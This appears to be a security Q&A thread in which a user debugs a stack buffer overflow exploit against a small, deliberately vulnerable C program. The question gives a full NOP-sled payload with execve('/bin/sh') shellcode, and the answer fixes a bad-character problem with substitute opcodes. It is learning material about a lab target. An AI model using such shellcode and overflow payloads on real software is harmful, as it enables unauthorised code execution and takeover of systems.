# Not able to run the injected shellcode

Tags: buffer-overflow, c, shellcode

```
#include <stdio.h>

void secret()
{
    printf("Congratulations!\n");
}

void echo()
{
    char array[60];
    scanf("%s", array);
    printf("You entered: %s\n", array);    
}

int main()
{
    echo();
    return 0;
}
```

above is the code which I am trying to exploit.

I have found the ebp address using gdb, although I know it's difficult to point to the exact location. I have used NOP sled technique

**buffer size allocated - 0x44 - 68bytes**

shell code is - 25 bytes

`python -c 'print "\x90"*47 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xa8\xbb\xff\xff"' | ./test`

I am trying to jump somewhere in the middle of NOP sled.

And not getting a segmentation fault, but neither am I getting the access to the shell.

Comment: Did you check for bad characters?

Comment: Yes, I did. Actually, when I try to jump to the address where the secret function is, it works perfectly.

Comment: Take the one which is 28 bytes in length, you can find it in exploit-db od you can make your own. Probably shellcode is bad

Comment: tried the one which is 28 bytes in length and 23 bytes in length.
got it from shellstorm, But same result.

Comment: Take a look at your disassembled HEX-shellcode and see if the ASM code makes sense. If it does and you still have the problem, TBH, I think it would be best for you to give us a complete walkthrough of the steps you took to reach that point. How you got the lengths, how you got the shellcode, how you found the bad characters and so on. Also, it'd be good to know what registers you take over and with what exact offset (look it up with Kali's `pattern_create` and `pattern_offset`).

Answer (score 1):

The problem is the `\x0b` character in your shellcode. It is a whitespace character (VT, Vertical Tab) and `scanf` stops reading at whitespace characters.

You may replace `\xb0\x0b` by `\xb0\x08\x40\x40\x40` which contains no whitespace characters.

```
b0 0b                   mov    al,0xb
```

is equivalent to

```
b0 08                   mov    al,0x8
40                      inc    eax
40                      inc    eax
40                      inc    eax
```

There may exist shorter solutions.

Comment: If this answer turns out to be correct then I'd suggest migrating this question to StackOverflow, as this seems like more of a programming bug than a security-related problem.

Comment: Nevermind, the question and the answer are year(s) old so there's no way to know if this answer turned out to be right.